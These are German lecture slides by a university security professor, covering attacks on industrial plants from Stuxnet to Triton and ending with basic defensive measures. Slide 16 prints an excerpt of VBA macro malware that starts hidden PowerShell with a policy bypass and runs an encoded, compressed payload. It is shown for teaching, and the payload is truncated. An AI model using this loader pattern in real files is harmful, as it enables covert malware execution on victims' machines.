Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern -...

37
VON URAN, KEKSEN UND FAHRRÄDERN - SICHERHEIT UND INDUSTRIE 4.0 PROF. DR. TOBIAS HEER – HOCHSCHULE ALBSTADT-SIGMARINGEN Photo credit: Schill on Visualhunt / CC BY

Transcript of Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern -...

Page 1: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

VON URAN, KEKSEN UND FAHRRÄDERN -SICHERHEIT UND INDUSTRIE 4.0PROF. DR. TOBIAS HEER – HOCHSCHULE ALBSTADT-SIGMARINGEN

Photo

credit: Schill on V

isualhunt/ C

C B

Y

Page 2: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

DISCLAIMER

� Einige der in diesem Foliensatz verwendeten Grafiken und Darstellungen sind urheberrechtlich geschützt. Sie wurden von mir gemäß §51 UrhG im Rahmen des 90‐minütigen Vortrages zum Zweck des Zitats verwendet und sind durch Quellenangaben gekennzeichnet.

� Von mir selbst erstellte Grafiken sind unter Namensnennung frei verwendbar (CC BY 3.0 DE)

2

Page 3: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

ZU MEINER PERSON

� Tobias Heer

� Hochschule: Professor an der Hochschule Albstadt-Sigmaringen

� Netzwerke

� Kommunikationssicherheit

� Offensive Sicherheit

� Industrie: CTO Office bei Hirschmann Automation & Control

� Sicherheit von Industrienetzwerken

� Industrie 4.0

� Drahtlose Kommunikation, WLAN

� Arbeit im Bereich Industrie 4.0

� Plattform Industrie 4.0 – AG 3 – Sicherheit vernetzter Systeme

� ZVEI – Sicherheit Industrie 4.0

3

Page 4: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

SICHERHEIT UND INDUSTRIE – EIN NEUES THEMA?

4

� Cyberangriffe auf Industrieanlagen gibt es bereits seit Jahrzehnten

� Besonders bekannt: Stuxnet

� Angriff auf Urananreicherung im Werk Natanz (Iran)

� Erste Stuxnet Version: November 2005

� Entdeckung von Stuxnet: ca. 2009

� Ende des Angriffs: Juni 2012

Quelle: http://blog.nuclearsecrecy.com/tag/centrifuges/

Page 5: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

ZIEL VON STUXNET

5

� Störung der Urananreicherung zum Bau von Atombomben in Natanz, Iran

� Malware für Siemens SiematicSteuerungen

� Schließen von Ventilen

� Ändern der Rotationsgeschwindigkeit

� Ziel: nachhaltiges Verhindern derKernwaffenproduktion

� Unterbrechung des Produktions-prozesses

� Zerstörung der Produktions-mittel

Höher angereichertes Uran

U-238 (nicht kernwaffenfähig)

Gas

förm

iges

Ura

n-H

exaf

lour

ide

UF 6

(99,

3% U

ran

238,

0,7

% U

ran

235

Zivile N

utzung 4-5% U

-235A

tom

bom

be: 90% U

-235

Bild der Zentrifuge: Gemeinfrei, https://commons.wikimedia.org/w/index.php?curid=1257584

Page 6: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

KOMPLEXITÄT DES STUXNET ANGRIFFS

6

� Angreifer bei Stuxnet: AdvancedPersistent Threat -Geheimdienste

� Stuxnet Eigenschaften

� Komplizierte Infektion über USB Sticks und infizierte Rechner

� Komplizierte Manipulation derAnlage

� Komplizierte Kommunikation

� Muss ich als Firma im schönen Schwabenländle Angst vor einem solchen Angreifer haben?

� Vermutlich eher nicht Ist nun alles gut?

Quelle: Byres Security

Kom

pliz

iert

er W

eg

Page 7: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

CYBERSICHERHEIT UND KEKSPRODUKTION –WAS KANN DA SCHON SCHIEF GEHEN?

7Photo credit: John.E.Robertson on https://visualhunt.com/re/296b7d Visualhunt CC BY

Page 8: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

ANGRIFF AUF EINE KANADISCHE KEKSFABRIK –AUGUST 2015 (INDUSTRIE 3.0)

� Annahme der Ingenieure: “Was soll schon passieren? Im schlimmsten Fall sind die Kekse ungenießbar. Da fällt uns eine Tagesproduktion aus.”

� Angreifer dringen ins Netzwerk einund beginnen damit dasNetzwerk zu analysieren

� Steuerungen wurden gestört

� Keine Kontrolle über die Anlage

� Keksteig trocknete in denRohren ein – die Rohre musstenherausgeschnitten werden

•8Photo on https://visualhunt.com/re/20b05cVisual Hunt

Beispielbild

Page 9: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

ANGRIFFE AUF DIE INDUSTRIE

9

Ang

riffe

auf

Indu

stri

eanl

agen

Ang

riffe

auf

Indu

stri

ebet

rieb

e

OT

IT

Black Energy 3

Pow

er Ukraine

(Dez 2015)

HA

VEX

RA

T(Spio

nage, OPC

)(D

ez 2014)

Nig

ht D

rago

n (S

piona

ge, O

il& G

as)

(200

9)

Stuxnet(Iran, Siem

ens PLCs)

(2010)

Ope

ration

Aur

ora

(Sp

iona

ge

& M

anip

., Tec

h) (

2009

)

Sham

oon

(Sau

di A

rabi

anO

li /W

iper

)(2

012)

Wan

nacr

y (R

anso

mw

are)

(Mai

, 201

7)

Black Energy 2(Spio

nage)(D

ez 2010)

Wannacry

DB

, Renault, N

issan…(M

ai 2017)

ZeitD

eutsches Stahlwerk

(Sabotage)

(2014)

TR

ITO

N/T

RISIS/H

atMan

(Malw

are gegen SafetyFunktio

nen)

(Dez 2017)

Ang

riff

auf R

ussi

sche

In

dust

rieb

etri

ebe

(Nove

mbe

r, 20

17-2

018)

BfV

War

nung

vor

Ang

riffe

n au

dIn

dust

rieb

etri

ebe

(Jun

i, 20

18)

Industroyer

Pow

er Ukraine

(Dez 2016)

Page 10: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

BLACKENERGY 2

10

� Blackenergy 2: Angriffe auf Industrieanlagen

� Primärer Fokus: HMI

� Siemens SIMATIC

� GE SIMPLICITY

� Advantech WebAccess

� Angriff gegen HMI Systeme die mit dem Internet verbunden waren

� Vorteil von Angriff auf HMI:

� Parameter können verändert werden

� Tatsächlicher Zustand der Anlage kann verschleiert werden

� Angreifer hat direkte Kontrolle über Internet-Verbindung

SCADA Interface einer Pumpensteuerung (bei shodan.io gefunden)

Originaler BlackEnergy Builder von 2007, Quelle: F-Secure.com

Page 11: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

DRAGONFLY / HAVEX RAT

11

� Die Dragonfly Kampagne verwendete das HAVEX Remote Access Tool (HAVEX RAT)

� Ca. 2000 Anlagen infiziert

� Hauptsächlich Anlagen aus dem Bereich PT&D und Petrochemie

� Angriff hatte „nur“ Spionage als Ziel Keine Unterbrechung der Produktion

� Verwendung von OPC um Industrieanlagen auszuhorchen und zu kartografieren

� Möglichkeit weitere Module und Funktionennachzuladen

� Verbreitung über verschiedene Wege:

� Spam Mails (Spear Phishing)

� Watering Hole Attack: Austausch der Gerätesoftwareauf Webseiten der Hersteller

� Hersteller in De, Fr und Ru betroffen

� Remote Management Software

� Kamera-Software

� ICS Applikationen

Hersteller-ServerSW Downloads)

OPC Server in Anlage

Integrator /Wartung:SW Update

???

Page 12: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

DEUTSCHES STAHLWERK 2014

12

� Erwähnung in BSI Lagebericht 2014

� Um welches Stahlwerk es sich handelt, wird nicht genannt.

� Der Vorfall blieb zunächst komplett geheim.

� Er wurde erst mit dem Lagebericht 2014 des Bundesamts für Sicherheit in der Informationstechnik bekannt

� Der Angriff führte dazu, dass ein Hochofen nicht mehr kontrolliert heruntergefahren werden konnte

� Die gesamte Anlage wurde schwer beschädigt

� Die genauen Schäden und Einzelheiten des Vorfalls wurden nicht veröffentlicht

Hochofen, Quelle: Wikipedia

Page 13: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

VORGEHENSWEISE DER ANGREIFER (LAUT BSI)

Erstellung einer gefälschten

Webseite mit Login Feldern

Mail an Service-Firma, mit dem

Link zur gefälschten Webseite

Erhalt der Zugangsdaten des

Service-Technikers

Zugriff auf das Stahlwerk mit den

Anmeldedaten des

Servicetechnikers

Autor: Simon Luib (HS-Albsig)

Hierbei wird angegeben, man sei Kunde der Servicefirma und die Anlage habe ein Problem

Der Techniker wird auf die Original Seite umgeleitet, um keinen Verdacht zu schöpfen

13

Secure

Stahl

Benutzername

******* Hilfe Problem!

Secure

Stahl

Max Muster_

Sunshine

!!

Page 14: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

BLACKENERGY 3 UND KIEW BLACKOUT 2015

14

� Angriff über Büro-Netzwerke des Energieversorgers Werchowna Rada

� Eindringen über Verbindungen zwischen Büro- und Produktionsnetzwerk

� Zerstörung von PC Systemen in den Anlagen durch KillDisk Malware

� Zerstörung von Seriell-zu-Ethernet Konvertern durch fehlerhafte Firmware

� Im Dezember 2015 wurden 225.000 Haushalte durch Blackenergy 3 vom Strom abgeschnitten

� Der Energieversorger benötigte 6 Stunden um die Anlagen wieder von Hand anzufahren

� In manchen Anlagen musste bis zu einem Jahr ein Handbetrieb gefahren werden

� Volle Automatisierung wurde erst nach einem Jahr wiederhergestellt

Umspannwerk, Quelle: Wikimedia[1]

Page 15: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

STROMAUSFALL IN DER UKRAINE (23.12.2015):

15

E-Mails an Mitarbeiter des

Energieversorgers Werchowna Rada

mit dem ukrainischen Parlament als

vermeintlichem Absender.

Anhang: eine Word-Datei; Beim Öffnen

erschien die Meldung, die Word-Version sei veraltet, zum Aktualisieren müsse ein Makro

ausgeführt werden.

Makro installiert Black Energy 3

Malware. Anlage wird über Büronetz infiziert

und gestört.

Hallo, hier Parlament!

!!Zu alt!Bitte

aktualisieren!

Page 16: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

MODERNE VBA MACRO MALWARE

16

Sub Workbook_Open()'VBA arch detect suggested by "T"Dim Command As StringDim str As StringDim exec As String

Arch = Environ("PROCESSOR_ARCHITECTURE")windir = Environ("windir")If Arch = "AMD64" Then

Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"Else

Command = "powershell.exe"End If

str = "nVRtc9pGEP7Or9jRXGekMZLFS6iNxjMhOG7cBuIaYqdlmM4hLeji05"str = str + "18Otlgwn/vCquYfO0XnXa1t8+zu8+KPcIFvHcas0spr7NcG+"…str = str + "KmSLmksQx1vnFZ3oSwCbPXhZ67bE2LREan7XpeEw4gVWl05f"str = str + "iPQ4hNtm5WR1gtnC6tr0pJqtn/VfyJRMxp7zDWJOuzXjcMdz"str = str + "T9ON3u/gU="

exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"exec = exec + "oding]::ASCII)).ReadToEnd();"""

Shell exec,vbHideEnd Sub

Macroshop Macro Code (Auszug)

Page 17: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

CRASHOVERRIDE / INDUSTROYER

17

� Malware die spezifisch auf Industrieanlagen zugeschnitten ist

� Ist in der Lage Schaltkreisunterbrecher in Umspannwerken und Kraftwerken zu manipulieren

� Ziele in den Bereichen Energie-, Wasserversorgung und Verkehrssteuerung

� Erfolgreicher Angriff (Test?) verursachten einen großflächigen Stromausfall für 75 Minuten in Kiew/Ukraine am 17. Dezember 2016

� Siemens SIPROTEC Unterbrecher

� Anonyme Kommunikation über TOR Netzwerk

� Angriff auf Los Angeles Verkehrssteuerungssystem verursachte Staus

� Adaptive Malware mit vielen Erweiterungen für Protokolle in Industrieanlagen

� IEC 104, IEC 101, IEC 61850, OPC DA

Kraftwerk, Quelle: Wikimedia

Page 18: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

INDUSTROYER / CRASHOVERRIDE MALWARE MAIN-BACKDOOR

Zusätzliches Backdoor

Zusätzliche ToolsMain-

Backdoor

Launcher

Data Wiper

101 Payload 104 Payload 61850 Payload OPC DA Payload

installiert kontrolliert

installiert

führt aus

führt aus

18Autor: Patrick Reck (HS-Albsig)

Einsatzbereit, falls die Main-Backdoor entdeckt wurde

Löscht Registry-Schlüssel, überschreibt Dateien, verwischt Spuren der Angreifer

führt aus

Überwacht und kontrolliert elektrische Systeme

Kann von den Angreifern stark angepasst/konfiguriert werden

Erzeugt eine Liste aller relevanten Geräte des Systems

Ermöglicht den Austausch und Veränderung der im System vorhandenen Komponenten

Page 19: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

WANNACRY / WANNACRYPTOR

19

� Ransomware Wannacry

� Infektion von ungeschütztenWindows Systemen (bisWindows 7) weltweit

� Große Schäden in Industrie-Anlagen, Transportwesen,etc.

� Malware dringt in Intranetder Firma ein und verbreitetsich von dort aus aufSysteme die nicht aus demInternet erreichbar sind

� Spezialsysteme (Kassensysteme,Geldautomaten, Anzeigen, …)aufgrund schlechtem Patch-Standbesonders betroffen

� Nettes Detail: Der Angriff stammt aus demArsenal der amerikanischen Geheimdiensteund wurde 5 Jahre lang unbemerkt genutzt

� Ca. 3000 Infektionen vonIndustrie-Anlagen mitgewöhnlicher Malwarejährlich (https://dragos.com/blog/mimics/)

Anzeigetafeln bei der Deutschen Bahn:

Geldautomaten in China:

Page 20: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

WANNA CRY - ÜBERSICHT

20

� Hintergrund:

� Veröffentlichungen auf Wiki Leaks über Schwachstellen im Windows Betriebssystem namens Eternalromance, -blue, -synergy.

� Höchst wahrscheinlich wurde Microsoft von der CIA über entwendete Zero Day Exploits gewarnt.

12. März 12. Mai14. April 13.Mai

Microsoft stellt vorsorglich einen Sicherheitspatch für unterstützte Systeme zur Verfügung

Veröffentlichung detaillierter ExploitAnleitungen

Experten warnen vor einem baldigem großangelegten Angriff

Erste Maleware unter Verwendung der veröffentlichtenSchwachstelle Eternalblue infiziert ein Krankenhaus in Großbritanien, ihr Name WannaCry

Ein entdeckter ,,Kill-switch‘‘ stoppte weitere Verbreitung in Netzwerken

Microsoft verteilt nachträglich kostenlose Updates für XP

Quelle: Heise-Security[1]

Autor: Daniel Grimm (HS-Albsig)

Page 21: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

AUSWIRKUNGEN VON WANNACRY

21

� 147 Varianten von WannaCry wurden gefunden (Quelle: AV Test)

� Schaden geht in die Milliarden

� Krankenhäuser in GB mussten Betrieb einschränken

� Ausfall der Fahrkartenautomaten und Anzeigetafeln der DB

� Innenministerium in Russland meldete 1.000 infizierte Rechner

� Renault stoppt Produktion in einigen Werken

� Nissan Werk Sunderland wurde infiziert

� Tankstellen und Geldautomaten in China konnten keine Transaktionen durchführen

� Telefónica, FedEx, Stahlkonzern Sandvik und viele weitere Betriebe betroffen

� Nur ca. 30.000 EUR Lösegeld erzielt

� War das Ziel wirklich das Lösegeld?

Page 22: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

ANGRIFF AUF INDUSTRIEANLAGE IN MITTLEREN OSTEN

22

� Bekannt unter Triton, Trisis und HatMan

� Angriff auf Safety System: Schneider Electric’s Triconex Safety InstrumentedSystem (SIS), Triconex 3008 Processor

� Safety System stellt die Funktionale Sicherheit in der Anlage her. Störung der Safety-Funktion kann zu Stillstand, Beschädigung der Anlage, Verschmutzung der Umwelt oder Verletzungen und Tod führen.

� Interpretation des Angriffs: Angreifer hatte nicht nur vor die Anlage zu stoppen (dies hätte er einfacher tun können).

� Die Versuche die Steuerung zu übernehmen deuten darauf hin, dass die Safety Funktion gestört werden sollte.

� Es deutet darauf hin, dass versucht wurde die Safety Funktionen, die im Fall eines Problems ablaufen zu verändern.

MES

ERP

SCADA

SPS

Feldgeräte Safety-kritischeFunktionen

Aut

om

atis

ieru

ngsp

yram

ide

Page 23: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

TRITON, TRISIS UND HATMAN

23

� Angreifer erlangten Kontrolle über einen Windows PC mit Zugang zum Programmierinterface der Sicherheitssteuerung

� Es wurde eine Malware ausgeführt, welche die Sicherheitssteuerung umprogrammieren kann

� Zwei Binaries für die Steuerung waren in der Malware enthalten: inject.bin und imain.bin. Sie enthielten veränderten Steuerungs und Konntroll-Code

� Malware konnte auf Safety Controller aufgespielt werden (Controller im Programming Mode)

� Die Malware wurde konnte nicht erfolgreich auf dem Controller ausgeführt werden. Nach leichten Moifikationen durch die Sicherheitsforscher war sie jedoch im Labor lauffähig.

� Malware wurde nicht durch Anti-Virus Scanner entdeckt

MES

ERP

SCADA

SPS

Feldgeräte

Safety-kritischeFunktionen

Aut

om

atis

ieru

ngsp

yram

ide

trilog.exe

imain.bininject.bin

Page 24: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

SICHERHEIT UND INDUSTRIE 4.0?

24

Page 25: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

… UND MIT INDUSTRIE 4.0?

25

� Kundenspezifische Produktion:

� Kunden können ihre eigenen Kekse bestellen?

� Wandelbare Produktion:

� Neue Zusammenstellung von Maschinen und Abläufen

� Stichwort Plug & Produce

� Wertschöpfungsnetzwerke

� Engere operative Zulieferer – Produzenten-Beziehungen

� Kommunikation über Unternehmensgrenzen

� Kommunikation über Standortgrenzen

� Dienstleister in der Fertigung

Firma A

Firma BFirma C

++

Page 26: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

TSN(IEEE EchtzeitEthernet)

Internet

I-4.0 - NEUE KOMMUNIKATIONSSTRUKTUREN

Pub/Sub

OPC-UA

MES

ERP

SCADA

SPS

Feldgeräte

Automatisierungspyramide Industrie 4.0 Kommunikation

Cloud

Partner

LocalCloud

Unternehmensebene

Betriebsleitebene

Prozessleitebene

Steuerungsebene

Feldebene

Gefahren

26

Page 27: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

EVOLUTION UND VERFEINERUNG DER ANGRIFFSWERKZEUGE

27

Zeit…. 1990 1995 2000 2005 2010 2015 Heute

Ars

enal

der

Ang

reife

r /

Vie

lfalt d

er A

ngri

ffe /

Notw

endi

ge V

erte

idig

ung

Page 28: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

TYPISCHE ANGRIFFSWEGE IN EINER INDUSTRIE-ANLAGE

28

Internet

FeldebeneKontroll LAN

InfizierterMaintenanceLaptop

Fehlende Zonierung

Fehlende Zonierung / Fehlende ACLs /Fehlende NAC

Unzureichende Isolation drahtloser Netzwerke

Schatten IT /schlecht gesicherte Modems /WLANs

Fehlende Zonierung

InfizierterRechner

Infizierte USBSticks

Fehlende NAC

UnauthorisierteVerbindungen

UngeschützteNetzwerkLaufwerke(z.B. mit Software /Updates)

Watering hole Attack

Fabrik Netz

3rd Party

3rd PartyProbleme

Office LAN

Schlecht geschützerRemote Access /Infizierte Rechner

Unverschlüsselte Kommunikation zwischen OPC Server/Client

Fehlende Benutzer-Authentifizierung

Safety-Controlleraus Fabriknetzansprechbar

UnzureichendeNAC

Default Konfigurationen /unsichere Konfigurationen

OT

IT

Page 29: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

29

Ang

riffe

auf

Indu

stri

eanl

agen

Ang

riffe

auf

Indu

stri

ebet

rieb

e

OT

IT

Black Energy 3

Pow

er Ukraine

(Dez 2015)

HA

VEX

RA

T(Spio

nage, OPC

)(D

ez 2014)

Nig

ht D

rago

n (S

piona

ge, O

il& G

as)

(200

9)

Stuxnet(Iran, Siem

ens PLCs)

(2010)

Ope

ration

Aur

ora

(Sp

iona

ge

& M

anip

., Tec

h) (

2009

)

Sham

oon

(Sau

di A

rabi

anO

li /W

iper

)(2

012)

Wan

nacr

y (R

anso

mw

are)

(Mai

, 201

7)

Black Energy 2(Spio

nage)(D

ez 2010)

Wannacry

DB

, Renault, N

issan…(M

ai 2017)

ZeitD

eutsches Stahlwerk

(Sabotage)

(2014)

TR

ITO

N/T

RISIS/H

atMan

(Malw

are gegen SafetyFunktio

nen)

(Dez 2017)

Ang

riff

auf R

ussi

sche

In

dust

rieb

etri

ebe

(Nove

mbe

r, 20

17-2

018)

BfV

War

nung

vor

Ang

riffe

n au

dIn

dust

rieb

etri

ebe

(Jun

i, 20

18)

Page 30: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

GEGENMASSNAHMENWIE VERHINDERT MAN DAS SCHLIMMSTE?

30

Page 31: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

WIE MACHT MAN COMPUTER, NETZWERKE UND FIRMEN SICHER?

� Verschiedene Sicherheitsmaßnahmen wirken auf unterschiedliche Art und Weise:

� Präventiv:

� Gute Passwörter, aktuelle Software, Anti-Virus, Schulungen, …

� Detektierend

� Intrusion Detection System, Systemüberwachung, Kontrolle

� Reaktiv

� Incident Response Team, Anti-Virus, Intrusion Prevention System

31Photos on Visualhunt https://visualhunt.com/re/d04967 , DocChewbacca on Visualhunt / CC BY-NC-SA,

Jay Phagan on VisualHunt.com / CC BY

Page 32: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

ISO/IEC 62443 SICHERHEITS-NORM FÜR DIE INDUSTRIE

32

Page 33: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

NACHHALTIGE SICHERHEIT PDCA (THEORIE)

33

PLAN

DO

CHECK

ACT

Page 34: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

NACHHALTIGE SICHERHEIT PDCA (REALITÄT)

34

PLAN(something)

DO(little)

CHECK(nothing)

ACT(never / too late)

Page 35: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

SCHLÜSSELMASSNAHMEN FÜR TECHNISCHE IT SICHERHEIT

� Systemsicherheit

� Aktuelle Software und Security-Patches verwenden

� Richtige initiale Konfiguration der Geräte (z.B. Default Passwörter ändern)

� Reduktion der Angriffsfläche (nicht gebrauchte Funktionen abschalten), Whitelisting

� Ereignisprotokollierung aktivieren

� Netzwerksicherheit

� Netzwerk über Firewalls und VLAN in Zonen aufteilen

� Verwendung von verschlüsselten Verbindungen

� Authentifizierung von End-Geräten durch Zertifikate

� Überwachung des Netzwerks auf verdächtige Aktivitäten (IDS)

� Sicherheit der Anlage

� Sicherheitskonzept ausarbeiten, dokumentieren und leben

� Ereignisprotokolle der Geräte zentral sammeln und auswerten

� Notfallprozeduren festlegen und üben

35

Page 36: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

STUDIENGANG IT SECURITY HS-ALBSIG

� Studieninhalte:

� IT Sicherheit und Prozesse

� Netzwerke, Netzwerksicherheit

� Betriebssysteme, Systemsicherheit

� Offensive Sicherheit

� Forensik

� Kryptografie

� Berufsbilder:

� Security Analyst

� IT Security Officer (ISO)

� Security Engineer (Entwickler)

� Security - Auditor

� Penetrationstester

� Projekte

� HSAS-Honeynet

� Beobachten realer Angreifer auf Köder-Infrastruktur

� Produkt Honeynet / Farm

� Beobachten des Umgangs von Angreifern mit (Kommunikations-) Produkten

� Sichere Industrienetze mit OPC UA

� Handhabbare Sicherheit mit OPC UA

� Testbed mit NAC, Zertifikatsbasiertem Zugriff, nachhaltiger Sicherheitspflege

36

Page 37: Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern - sicherheit und industrie 4.0 prof. dr. tobias heer – hochschule albstadt-sigmaringen

ZUSAMMENFASSEND: DIE SACHE MIT DER IT SICHERHEIT

37

� IT Security ist ein Katz- und Maus- Spiel zwischen Angreifern und Verteidigern

� Neue Angriffe Neue Verteidigung Neue Angriffe

� Die Ausgangslage ist nicht besonders günstig

� Verteidigung: alle Teile eines Systems müssen zu jeder Zeit sicher sein

� Angriff: es genügt wenn ein Teil eines Systems momentan unsicher ist

� Es gibt keine Wunderwaffen in der IT Sicherheit

� Mitdenken ist gefragt!

Was ist das Allerwichtigste wenn man sein Rad vor Diebstahl schützen will?

Gesunder Menschenverstand!